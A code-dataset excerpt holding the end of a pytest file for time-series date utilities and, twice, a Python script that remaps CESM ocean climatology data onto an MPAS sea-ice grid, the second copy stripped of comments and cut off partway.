expectedl = pd.Series([2.0, 4.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
expectedr = pd.Series([20.0, 40.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
result = align(x, y, Interpolate.INTERSECT)
assert_series_equal(result[0], expectedl, obj="Align intersect left")
assert_series_equal(result[1], expectedr, obj="Align intersect left")
result = align(y, x, Interpolate.INTERSECT)
assert_series_equal(result[0], expectedr, obj="Align intersect right")
assert_series_equal(result[1], expectedl, obj="Align intersect right")
union_dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=union_dates)
expected2 = pd.Series([np.nan, 20.0, np.nan, 40.0, np.nan, 60.0], index=union_dates)
result = align(x, y, Interpolate.NAN)
assert_series_equal(result[0], expected1, obj="Align NaN left")
assert_series_equal(result[1], expected2, obj="Align NaN left")
result = align(y, x, Interpolate.NAN)
assert_series_equal(result[0], expected2, obj="Align NaN right")
assert_series_equal(result[1], expected1, obj="Align NaN right")
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 0.0], index=union_dates)
expected2 = pd.Series([0.0, 20.0, 0.0, 40.0, 0.0, 60.0], index=union_dates)
result = align(x, y, Interpolate.ZERO)
assert_series_equal(result[0], expected1, obj="Align zero left")
assert_series_equal(result[1], expected2, obj="Align zero left")
result = align(y, x, Interpolate.ZERO)
assert_series_equal(result[0], expected2, obj="Align zero right")
assert_series_equal(result[1], expected1, obj="Align zero right")
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 5.0], index=union_dates)
expected2 = pd.Series([20.0, 20.0, 20.0, 40.0, 40.0, 60.0], index=union_dates)
result = align(x, y, Interpolate.STEP)
assert_series_equal(result[0], expected1, obj="Align step left")
assert_series_equal(result[1], expected2, obj="Align step left")
result = align(y, x, Interpolate.STEP)
assert_series_equal(result[0], expected2, obj="Align step left")
assert_series_equal(result[1], expected1, obj="Align step left")
xp = x.copy()
yp = y.copy()
xp.index = pd.to_datetime(xp.index)
yp.index = pd.to_datetime(yp.index)
up = pd.to_datetime(union_dates)
expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=up)
expected2 = pd.Series([np.nan, 20.0, 30.0, 40.0, 50.0, 60.0], index=up)
result = align(xp, yp, Interpolate.TIME)
assert_series_equal(result[0], expected1, obj="Align time left")
assert_series_equal(result[1], expected2, obj="Align time left")
result = align(yp, xp, Interpolate.TIME)
assert_series_equal(result[0], expected2, obj="Align time right")
assert_series_equal(result[1], expected1, obj="Align time right")
a = pd.Series([0, 100, 110], index=pd.DatetimeIndex(['2019-07-01', '2019-07-08', '2019-07-10']))
b = pd.Series([20, 60, 70], index=pd.DatetimeIndex(['2019-07-02', '2019-07-10', '2019-07-11']))
result = align(a, b, Interpolate.TIME)
u_index = a.index.union(b.index)
assert_series_equal(result[0], pd.Series([0, 100 / 7, 100, 110, np.nan], index=u_index))
assert_series_equal(result[1], pd.Series([np.nan, 20, 50, 60, 70], index=u_index))
result = align(x, 3)
assert_series_equal(result[0], x, obj="Align scalar left")
assert_series_equal(result[1], pd.Series(3, index=dates1), obj="Align scalar left")
result = align(3, x)
assert_series_equal(result[0], pd.Series(3, index=dates1), obj="Align scalar left")
assert_series_equal(result[1], x, obj="Align scalar right")
result = align(1, 2)
assert result[0] == 1
assert result[1] == 2
with pytest.raises(MqValueError):
align(x, x, "None")
def test_interpolate():
dates = [
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 5),
date(2019, 1, 7),
]
x = pd.Series([2.0, 3.0, 5.0, 7.0], index=dates)
result = interpolate(x, dates)
assert_series_equal(result, x, obj="Interpolate series by dates")
result = interpolate(x, x)
assert_series_equal(result, x, obj="Interpolate series by series dates")
result = interpolate(x)
assert_series_equal(result, x, obj="Interpolate series default")
select_dates = [
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 7),
]
result = interpolate(x, select_dates)
expected = pd.Series([2.0, 3.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate subset of dates")
select_dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
date(2019, 1, 7),
date(2019, 1, 8),
]
intersect_dates = [
date(2019, 1, 2),
date(2019, 1, 5),
date(2019, 1, 7),
]
result = interpolate(x, select_dates, Interpolate.INTERSECT)
expected = pd.Series([2.0, 5.0, 7.0], index=intersect_dates)
assert_series_equal(result, expected, obj="Interpolate intersect")
result = interpolate(x, select_dates, Interpolate.NAN)
expected = pd.Series([np.nan, 2.0, np.nan, 5.0, np.nan, 7.0, np.nan], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate nan")
result = interpolate(x, select_dates, Interpolate.ZERO)
expected = pd.Series([0.0, 2.0, 0.0, 5.0, 0.0, 7.0, 0.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate zero")
result = interpolate(x, select_dates, Interpolate.STEP)
expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate step dates")
result = interpolate(x, pd.Series(np.nan, select_dates), Interpolate.STEP)
expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate step series")
xnan = pd.Series([np.nan, 3.0, 5.0, 7.0], index=dates)
result = interpolate(xnan, select_dates, Interpolate.STEP)
expected = pd.Series([np.nan, np.nan, np.nan, 5.0, 5.0, 7.0, 7.0], index=select_dates)
assert_series_equal(result, expected, obj="Interpolate flat nan start")
x = pd.Series([2.0, 3.0, 5.0, 7.0], index=pd.DatetimeIndex(dates))
result = interpolate(x, select_dates, Interpolate.STEP)
expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=pd.DatetimeIndex(select_dates))
assert_series_equal(result, expected, obj="Interpolate step dates to series with timestamps")
with pytest.raises(MqValueError, match="Unknown intersection type: None"):
interpolate(x, x, "None")
with pytest.raises(MqValueError, match="Cannot perform step interpolation on an empty series"):
interpolate(pd.Series(), select_dates, Interpolate.STEP)
def test_value():
dates = [
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 5),
date(2019, 1, 7),
]
x = pd.Series([2.0, 3.0, 5.0, 7.0], index=dates)
result = value(x, date(2019, 1, 3))
assert result == 3.0
result = value(x, date(2019, 1, 5))
assert result == 5.0
result = value(x, date(2019, 1, 4))
assert result == 3.0
result = value(x, date(2019, 1, 4), Interpolate.INTERSECT)
assert result is None
result = value(x, date(2019, 1, 4), Interpolate.STEP)
assert result == 3.0
result = value(x, date(2019, 1, 4), Interpolate.ZERO)
assert result == 0.0
result = value(x, date(2019, 1, 4), Interpolate.NAN)
assert np.isnan(result)
def test_day():
dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = day(x)
expected = pd.Series([1, 2, 3, 4], index=dates)
assert_series_equal(result, expected, obj="Day")
def test_weekday():
dates = [
date(2019, 1, 7),
date(2019, 1, 8),
date(2019, 1, 9),
date(2019, 1, 10),
date(2019, 1, 11),
date(2019, 1, 12),
date(2019, 1, 13),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0], index=dates)
result = weekday(x)
expected = pd.Series([0, 1, 2, 3, 4, 5, 6], index=dates)
assert_series_equal(result, expected, obj="Weekday")
def test_month():
dates = [
date(2019, 1, 1),
date(2019, 2, 1),
date(2019, 3, 1),
date(2019, 4, 1),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = month(x)
expected = pd.Series([1, 2, 3, 4], index=dates)
assert_series_equal(result, expected, obj="Month")
def test_year():
dates = [
date(2019, 1, 1),
date(2020, 1, 2),
date(2021, 1, 3),
date(2022, 1, 4),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = year(x)
expected = pd.Series([2019, 2020, 2021, 2022], index=dates)
assert_series_equal(result, expected, obj="Year")
def test_quarter():
dates = [
date(2019, 1, 1),
date(2019, 4, 1),
date(2019, 7, 1),
date(2019, 10, 1),
]
x = pd.Series([1.0, 2.0, 3.0, 4.0], index=dates)
result = quarter(x)
expected = pd.Series([1, 2, 3, 4], index=dates)
assert_series_equal(result, expected, obj="Quarter")
def test_day_count_fractions():
dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
x = pd.Series([])
assert_series_equal(x, day_count_fractions(x))
x = pd.Series([100.0, 101, 103.02, 100.9596, 100.9596, 102.978792], index=dates)
result = day_count_fractions(x, DayCountConvention.ACTUAL_360)
result2 = day_count_fractions(x.index, DayCountConvention.ACTUAL_360)
dcf = 1 / 360
expected = pd.Series([np.NaN, dcf, dcf, dcf, dcf, dcf], index=dates)
assert_series_equal(result, expected, obj="ACT/360")
assert_series_equal(result2, expected, obj="ACT/360")
result = day_count_fractions(x, DayCountConvention.ACTUAL_365F)
dcf = 1 / 365
expected = pd.Series([np.NaN, dcf, dcf, dcf, dcf, dcf], index=dates)
assert_series_equal(result, expected, obj="ACT/365")
def test_date_range():
dates = [
date(2019, 1, 1),
date(2019, 1, 2),
date(2019, 1, 3),
date(2019, 1, 4),
date(2019, 1, 5),
date(2019, 1, 6),
]
values = [1.0, 2.0, 3.0, 4.0, 5.0, 7.0]
s0 = pd.Series(values, index=dates)
s1 = pd.Series(values, index=pd.date_range('2019-01-01', periods=6, freq='D'))
for x in [s0, s1]:
assert (date_range(x, 0, 0) == x).all()
assert (date_range(x, 0, 0, True) == x.iloc[:-2]).all()
assert date_range(x, 0, date(2019, 1, 3)).index[-1] == date(2019, 1, 3)
assert (date_range(x, 0, date(2019, 1, 3)) == x.iloc[:3]).all()
assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[0] == date(2019, 1, 3)
assert date_range(x, date(2019, 1, 3), date(2019, 1, 6)).index[-1] == date(2019, 1, 6)
assert (date_range(x, date(2019, 1, 3), date(2019, 1, 6)) == x.iloc[2:6]).all()
y = pd.Series(values, index=pd.date_range('2020-10-23', periods=6, freq='D'))
assert (date_range(y, 1, 1, True) == y.iloc[3:5]).all()
with pytest.raises(MqValueError):
date_range(pd.Series([1]), 0, 0)
with pytest.raises(MqTypeError):
date_range(pd.Series([1]), 0, 0, 'string')
def test_prepend():
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', "2019-01-06"))
y = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-03', '2019-01-05'))
assert_series_equal(prepend([]), pd.Series(dtype='float64'), obj='prepend empty')
assert_series_equal(prepend([x]), x, obj='prepend one series')
actual = prepend([x, y])
expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', '2019-01-05'))
assert_series_equal(actual, expected, obj='prepend two series')
x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 7.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
y = pd.Series([3.1, 4.1, 5.1], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
actual = prepend([x, y])
expected = pd.Series([1.0, 2.0, 3.1, 4.1, 5.1], index=pd.date_range('2019-01-01', periods=5, freq='H'))
assert_series_equal(actual, expected, obj='prepend two real-time series')
def test_union():
x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-03', '2019-01-05'))
y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', "2019-01-06"))
z = pd.Series([60.0, 70.0], index=pd.date_range('2019-01-06', "2019-01-07"))
assert_series_equal(union([]), pd.Series(dtype='float64'), obj='union empty')
x.index.freq = None
assert_series_equal(union([x]), x, obj='union of one series')
actual = union([x, y, z])
expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0, 70], index=pd.date_range('2019-01-01', '2019-01-07'))
assert_series_equal(actual, expected, obj='union of three series')
x = pd.Series([3.1, 4.1, np.nan], index=pd.date_range('2019-01-01 02:00', periods=3, freq='H'))
y = pd.Series([1.0, np.nan, 3.0, 4.0, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
actual = union([x, y])
expected = pd.Series([1.0, np.nan, 3.1, 4.1, 5.0, 6.0], index=pd.date_range('2019-01-01', periods=6, freq='H'))
assert_series_equal(actual, expected, obj='union of two real-time series')
def test_bucketize():
dates = pd.bdate_range(start='1/1/2021', end='4/23/2021')
series = pd.Series(range(len(dates)), index=dates)
actual = bucketize(series, AggregateFunction.MAX, AggregatePeriod.MONTH)
expected_index = pd.DatetimeIndex([date(2021, 1, 31), date(2021, 2, 28), date(2021, 3, 31), date(2021, 4, 30)])
expected = pd.Series([20, 40, 63, 80], index=expected_index)
actual.index.freq = None
assert_series_equal(actual, expected, check_index_type=False)
def test_day_count():
assert day_count(datetime.date(2021, 5, 7), datetime.date(2021, 5, 10)) == 1
assert day_count(datetime.date(2021, 5, 10), datetime.date(2021, 5, 14)) == 4
assert day_count(datetime.date(2021, 5, 10), datetime.date(2021, 5, 17)) == 5
with pytest.raises(MqValueError):
day_count(datetime.date(2021, 5, 7), '2021-05-10')
if __name__ == "__main__":
pytest.main(args=["test_datetime.py"])
| true | true |
f725d794e1c2ea3a0dadaac39e0ba98d95db8820 | 11,101 | py | Python | components/mpas-seaice/testing_and_setup/forcing/create_ocean_forcing.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 235 | 2018-04-23T16:30:06.000Z | 2022-03-21T17:53:12.000Z | components/mpas-seaice/testing_and_setup/forcing/create_ocean_forcing.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 2,372 | 2018-04-20T18:12:34.000Z | 2022-03-31T23:43:17.000Z | components/mpas-seaice/testing_and_setup/forcing/create_ocean_forcing.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 254 | 2018-04-20T20:43:32.000Z | 2022-03-30T20:13:38.000Z | from __future__ import print_function
from netCDF4 import Dataset
import netCDF4
import numpy as np
import os
import sys
import ConfigParser
import math
from scipy.interpolate import griddata
from create_forcing import create_scrip_grid_file, get_mpas_grid_info, create_scrip_file_MPAS, write_scrip_in_file, create_output_times, get_remapping_data
#-------------------------------------------------------------------------------
def latlon_to_xyz(lat, lon):
x = math.cos(lat) * math.cos(lon)
y = math.cos(lat) * math.sin(lon)
z = math.sin(lat)
return x, y, z
#-------------------------------------------------------------------------------
def xyz_to_latlon(x, y, z):
lon = 0.0
if (x != 0.0 or y != 0.0): lon = math.atan2(y,x)
lat = math.asin(z / math.sqrt(x*x + y*y + z*z))
return lat, lon
#-------------------------------------------------------------------------------
def create_scrip_file_gx1(filenameScrip, filenameGx1Grid):
filenameGx1Grid = "/Users/akt/Work/Forcing/gx1/grid_info/global_gx1.nc"
fileIn = Dataset(filenameGx1Grid,"r")
nx = len(fileIn.dimensions["nx"])
ny = len(fileIn.dimensions["ny"])
ULONin = fileIn.variables["ULON"][:]
ULATin = fileIn.variables["ULAT"][:]
KMT = fileIn.variables["KMT"][:]
fileIn.close()
nCells = nx * ny
gridDims = [nx, ny]
gridImask = np.ones(nCells,dtype="i")
ULAT = np.zeros((ny+1,nx+1))
ULON = np.zeros((ny+1,nx+1))
ULAT[1:,1:] = ULATin[:,:]
ULON[1:,1:] = ULONin[:,:]
ULAT[:,0] = ULAT[:,-1]
ULON[:,0] = ULON[:,-1]
ULON[0,:] = ULON[1,:]
ULAT[0,:] = ULAT[1,:] - math.pi / 180.0
cornerLat = np.zeros((4,nCells))
cornerLon = np.zeros((4,nCells))
for i in range(0,nx):
for j in range(0,ny):
ii = i + 1
jj = j + 1
iCell = ii + nx * (jj-1) - 1
i1 = ii-1 ; j1 = jj-1
i2 = ii ; j2 = jj-1
i3 = ii ; j3 = jj
i4 = ii-1 ; j4 = jj
cornerLat[0,iCell] = ULAT[j1,i1]
cornerLat[1,iCell] = ULAT[j2,i2]
cornerLat[2,iCell] = ULAT[j3,i3]
cornerLat[3,iCell] = ULAT[j4,i4]
cornerLon[0,iCell] = ULON[j1,i1]
cornerLon[1,iCell] = ULON[j2,i2]
cornerLon[2,iCell] = ULON[j3,i3]
cornerLon[3,iCell] = ULON[j4,i4]
centerLat = np.zeros(nCells)
centerLon = np.zeros(nCells)
for i in range(0,nx):
for j in range(0,ny):
ii = i + 1
jj = j + 1
iCell = ii + nx * (jj-1) - 1
x1,y1,z1 = latlon_to_xyz(cornerLat[0,iCell],cornerLon[0,iCell])
x2,y2,z2 = latlon_to_xyz(cornerLat[1,iCell],cornerLon[1,iCell])
x3,y3,z3 = latlon_to_xyz(cornerLat[2,iCell],cornerLon[2,iCell])
x4,y4,z4 = latlon_to_xyz(cornerLat[3,iCell],cornerLon[3,iCell])
x0 = 0.25 * (x1 + x2 + x3 + x4)
y0 = 0.25 * (y1 + y2 + y3 + y4)
z0 = 0.25 * (z1 + z2 + z3 + z4)
centerLat[iCell], centerLon[iCell] = xyz_to_latlon(x0, y0, z0)
create_scrip_grid_file(filenameScrip, nCells, 4, 2, gridDims, centerLat, centerLon, gridImask, cornerLat, cornerLon, "gx1")
#-------------------------------------------------------------------------------
def fill_array(arrayIn):
nTimes = arrayIn.shape[0]
nx = arrayIn.shape[1]
ny = arrayIn.shape[2]
arrayOut = np.zeros((nTimes,nx,ny))
arrayOut[:] = arrayIn[:]
grid_x, grid_y = np.mgrid[0:nx, 0:ny]
for iTime in range(0,nTimes):
array = np.zeros((nx,3*ny))
array[:, 0: ny] = arrayIn[iTime,:,:]
array[:, ny:2*ny] = arrayIn[iTime,:,:]
array[:,2*ny:3*ny] = arrayIn[iTime,:,:]
pointsGood = []
valuesGood = []
pointsBad = []
for i in range(0,nx):
for j in range(0,ny):
if (array[i,j] > -900.0):
pointsGood.append((i,j))
valuesGood.append(array[i,j])
else:
pointsBad.append((i,j))
pointsGood = np.array(pointsGood)
valuesGood = np.array(valuesGood)
pointsBad = np.array(pointsBad)
valuesBad = griddata(pointsGood, valuesGood, (grid_x, grid_y), method='nearest')
for iBad in range(0,pointsBad.shape[0]):
i = pointsBad[iBad,0]
j = pointsBad[iBad,1]
arrayOut[iTime,i,j] = valuesBad[i,j]
return arrayOut
#-------------------------------------------------------------------------------
def interpolate_array(nCells, remapMatrix, arrayIn):
arrayOut = np.zeros((12,nCells))
for iTime in range(0,12):
arrayInTime = arrayIn[iTime,:,:].flatten()
arrayOut[iTime,:] = remapMatrix.dot(arrayInTime)
return arrayOut
#-------------------------------------------------------------------------------
def create_forcing(\
filenameIn, \
filenameOut, \
nCells, \
remapMatrix):
fileIn = Dataset(filenameIn,"r")
fileOut = Dataset(filenameOut,"w",format="NETCDF3_CLASSIC")
fileOut.createDimension("nCells",nCells)
fileOut.createDimension("StrLen",64)
fileOut.createDimension("Time",None)
# time
xtimes = create_output_times(12, 0)
varXtime = fileOut.createVariable("xtime","c",dimensions=["Time","StrLen"])
for iTime in range(0,12):
varXtime[iTime,0:19] = netCDF4.stringtochar(np.array(xtimes[iTime], 'S19'))
varXtime[iTime,19:] = " "*45
varSST = fileOut.createVariable("seaSurfaceTemperature", "d",dimensions=["Time","nCells"])
varSSS = fileOut.createVariable("seaSurfaceSalinity", "d",dimensions=["Time","nCells"])
varU = fileOut.createVariable("uOceanVelocity", "d",dimensions=["Time","nCells"])
varV = fileOut.createVariable("vOceanVelocity", "d",dimensions=["Time","nCells"])
varDhdx = fileOut.createVariable("seaSurfaceTiltU", "d",dimensions=["Time","nCells"])
varDhdy = fileOut.createVariable("seaSurfaceTiltV", "d",dimensions=["Time","nCells"])
varHblt = fileOut.createVariable("oceanMixedLayerDepth", "d",dimensions=["Time","nCells"])
varQdp = fileOut.createVariable("oceanHeatFluxConvergence","d",dimensions=["Time","nCells"])
print("Interpolate seaSurfaceTemperature")
arrayIn = fileIn.variables["T"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varSST[:] = arrayOut[:]
print("Interpolate seaSurfaceSalinity")
arrayIn = fileIn.variables["S"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varSSS[:] = arrayOut[:]
print("Interpolate uOceanVelocity")
arrayIn = fileIn.variables["U"][:,0,:,:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varU[:] = arrayOut[:]
print("Interpolate vOceanVelocity")
arrayIn = fileIn.variables["V"][:,0,:,:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varV[:] = arrayOut[:]
print("Interpolate seaSurfaceTiltU")
arrayIn = fileIn.variables["dhdx"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varDhdx[:] = arrayOut[:]
print("Interpolate seaSurfaceTiltV")
arrayIn = fileIn.variables["dhdy"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varDhdy[:] = arrayOut[:]
print("Interpolate oceanMixedLayerDepth")
arrayIn = fileIn.variables["hblt"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varHblt[:] = arrayOut[:]
print("Interpolate oceanHeatFluxConvergence")
arrayIn = fileIn.variables["qdp"][:]
arrayIn = fill_array(arrayIn)
arrayOut = interpolate_array(nCells, remapMatrix, arrayIn)
varQdp[:] = arrayOut[:]
fileIn.close()
fileOut.close()
#-------------------------------------------------------------------------------
def perform_remapping(\
filenameMPASGrid, \
filenameGx1Grid, \
filenameGx1OceanMixed, \
filenameMPASOceanMixed, \
scripDir):
# create MPAS scrip grid file
print("create_scrip_file_MPAS")
scripGridFilename = "remap_grid_MPAS_tmp.nc"
create_scrip_file_MPAS(filenameMPASGrid, scripGridFilename)
# create gx1 scrip grid file
print("create_scrip_file_gx1")
scripGx1Filename = "remap_grid_gx1_tmp.nc"
create_scrip_file_gx1(scripGx1Filename, filenameGx1Grid)
# create input scrip file
print("write_scrip_in_file")
write_scrip_in_file("gx1")
# run scrip to generate weights
print("SCRIP")
cmd = scripDir + "/scrip"
os.system(cmd)
# get remapping weights
print("get_remapping_data")
filenameRemapping = "remap_gx1_to_MPAS_tmp.nc"
remapMatrix, dstGridSize = get_remapping_data(filenameRemapping)
print("create_forcing ocean climatology")
# combined ocean climatology
create_forcing(\
filenameGx1OceanMixed, \
filenameMPASOceanMixed, \
dstGridSize, \
remapMatrix)
#-------------------------------------------------------------------------------
'''
create_ocean_forcing.py
=======================
Usage
-----
This script creates ocean forcing using CESM output.
Usage: python create_ocean_forcing.py configFilename
where configFilename is a python config file with the following example format:
[forcing_generation]
filenameMPASGrid = /location/of/MPAS/grid
filenameGx1Grid = /location/of/gx1/grid
filenameGx1OceanMixed = /location/of/gx1/ocean_mixed_file
filenameMPASOceanMixed = /location/of/output/ocean_mixed_file
scripDir = /location/of/SCRIP/executable
SCRIP
-----
This script requires the SCRIP package to be installed.
SCRIP is a software package which computes addresses and weights for remapping
and interpolating fields between grids in spherical coordinates. It can be
obtained from https://github.com/SCRIP-Project/SCRIP
gx1 input data
--------------
This script requires a gx1 grid file and ocean mixed file as input. These can be
obtained from:
https://web.lcrc.anl.gov/public/e3sm/mpas_standalonedata/mpas-seaice/forcing/
MPAS-Seaice_clim_data.tar.gz
'''
if (len(sys.argv) != 2):
print("Usage: python create_ocean_forcing.py configFilename")
sys.exit()
config = ConfigParser.ConfigParser()
config.read(sys.argv[1])
filenameMPASGrid = config.get('forcing_generation','filenameMPASGrid')
filenameGx1Grid = config.get('forcing_generation','filenameGx1Grid')
filenameGx1OceanMixed = config.get('forcing_generation','filenameGx1OceanMixed')
filenameMPASOceanMixed = config.get('forcing_generation','filenameMPASOceanMixed')
scripDir = config.get('forcing_generation','scripDir')
perform_remapping(\
filenameMPASGrid, \
filenameGx1Grid, \
filenameGx1OceanMixed, \
filenameMPASOceanMixed, \
scripDir)
| 30.836111 | 155 | 0.602198 | from __future__ import print_function
from netCDF4 import Dataset
import netCDF4
import numpy as np
import os
import sys
import ConfigParser
import math
from scipy.interpolate import griddata
from create_forcing import create_scrip_grid_file, get_mpas_grid_info, create_scrip_file_MPAS, write_scrip_in_file, create_output_times, get_remapping_data
def latlon_to_xyz(lat, lon):
x = math.cos(lat) * math.cos(lon)
y = math.cos(lat) * math.sin(lon)
z = math.sin(lat)
return x, y, z
def xyz_to_latlon(x, y, z):
lon = 0.0
if (x != 0.0 or y != 0.0): lon = math.atan2(y,x)
lat = math.asin(z / math.sqrt(x*x + y*y + z*z))
return lat, lon
def create_scrip_file_gx1(filenameScrip, filenameGx1Grid):
filenameGx1Grid = "/Users/akt/Work/Forcing/gx1/grid_info/global_gx1.nc"
fileIn = Dataset(filenameGx1Grid,"r")
nx = len(fileIn.dimensions["nx"])
ny = len(fileIn.dimensions["ny"])
ULONin = fileIn.variables["ULON"][:]
ULATin = fileIn.variables["ULAT"][:]
KMT = fileIn.variables["KMT"][:]
fileIn.close()
nCells = nx * ny
gridDims = [nx, ny]
gridImask = np.ones(nCells,dtype="i")
ULAT = np.zeros((ny+1,nx+1))
ULON = np.zeros((ny+1,nx+1))
ULAT[1:,1:] = ULATin[:,:]
ULON[1:,1:] = ULONin[:,:]
ULAT[:,0] = ULAT[:,-1]
ULON[:,0] = ULON[:,-1]
ULON[0,:] = ULON[1,:]
ULAT[0,:] = ULAT[1,:] - math.pi / 180.0
cornerLat = np.zeros((4,nCells))
cornerLon = np.zeros((4,nCells))
for i in range(0,nx):
for j in range(0,ny):
ii = i + 1
jj = j + 1
iCell = ii + nx * (jj-1) - 1
i1 = ii-1 ; j1 = jj-1
i2 = ii ; j2 = jj-1
i3 = ii ; j3 = jj
i4 = ii-1 ; j4 = jj
cornerLat[0,iCell] = ULAT[j1,i1]
cornerLat[1,iCell] = ULAT[j2,i2]
cornerLat[2,iCell] = ULAT[j3,i3]
cornerLat[3,iCell] = ULAT[j4,i4]
cornerLon[0,iCell] = ULON[j1,i1]
cornerLon[1,iCell] = ULON[j2,i2]
cornerLon[2,iCell] = ULON[j3,i3]
cornerLon[3,iCell] = ULON[j4,i4]
centerLat = np.zeros(nCells)
centerLon = np.zeros(nCells)
for i in range(0,nx):
for j in range(0,ny):
ii = i + 1
jj = j + 1
iCell = ii + nx * (jj-1) - 1
x1,y1,z1 = latlon_to_xyz(cornerLat[0,iCell],cornerLon[0,iCell])
x2,y2,z2 = latlon_to_xyz(cornerLat[1,iCell],cornerLon[1,iCell])
x3,y3,z3 = latlon_to_xyz(cornerLat[2,iCell],cornerLon[2,iCell])
x4,y4,z4 = latlon_to_xyz(cornerLat[3,iCell],cornerLon[3,iCell])
x0 = 0.25 * (x1 + x2 + x3 + x4)
y0 = 0.25 * (y1 + y2 + y3 + y4)
z0 = 0.25 * (z1 + z2 + z3 + z4)
centerLat[iCell], centerLon[iCell] = xyz_to_latlon(x0, y0, z0)
create_scrip_grid_file(filenameScrip, nCells, 4, 2, gridDims, centerLat, centerLon, gridImask, cornerLat, cornerLon, "gx1")
def fill_array(arrayIn):
nTimes = arrayIn.shape[0]
nx = arrayIn.shape[1]
ny = arrayIn.shape[2]
arrayOut = np.zeros((nTimes,nx,ny))
arrayOut[:] = arrayIn[:]
grid_x, grid_y = np.mgrid[0:nx, 0:ny]
for iTime in range(0,nTimes):
array = np.zeros((nx,3*ny))
array[:, 0: ny] = arrayIn[iTime,:,:]
array[:, ny:2*ny] = arrayIn[iTime,:,:]
array[:,2*ny:3*ny] = arrayIn[iTime,:,:]
pointsGood = []
valuesGood = []
pointsBad = []
for i in range(0,nx):
for j in range(0,ny):
if (array[i,j] > -900.0):
pointsGood.append((i,j))
valuesGood.append(array[i,j])
else:
pointsBad.append((i,j))
pointsGood = np.array(pointsGood)
valuesGood = np.array(valuesGood)
pointsBad = np.array(pointsBad)
valuesBad = griddata(pointsGood, valuesGood, (grid_x, grid_y), method='nearest')
for iBad in range(0,pointsBad.shape[0]):
i = pointsBad[iBad,0]
j = pointsBad[iBad,1]
arrayOut[iTime,i,j] = valuesBad[i,j]
return arrayOut
def interpolate_array(nCells, remapMatrix, arrayIn):
arrayOut = np.zeros((12,nCells))
for iTime in range(0,12):
arrayInTime = arrayIn[iTime,:,:].flatten()
arrayOut[iTime,:] = remapMatrix.dot(arrayInTime)
return arrayOut
def create_forcing(\
filenameIn, \
filenameOut, \
nCells, \
remapMatrix):
fileIn = Dataset(filenameIn,"r")
fileOut = Dataset(filenameOut,"w",format="NETCDF3_CLASSIC")
fileOut.createDimension("nCells",nCells)
fileOut.createDimension("StrLen",64)
fileOut.createDimension("Time",None)
xtimes = create_output_times(12, 0)
varXtime = fileOut.createVariable("xtime","c",dimensions=["Time","StrLen"])
for iTime in range(0,12):
varXtime[iTime,0:19] = netCDF4.stringtochar(np.array(xtimes[iTime], 'S19'))
varXtime[iTime,19:] = " "*45
varSST = fileOut.createVariable("seaSurfaceTemperature", "d",dimensions=["Time","nCells"])
varSSS = fileOut.createVariable("seaSurfaceSalinity", "d",dimensions=["Time","nCells"])
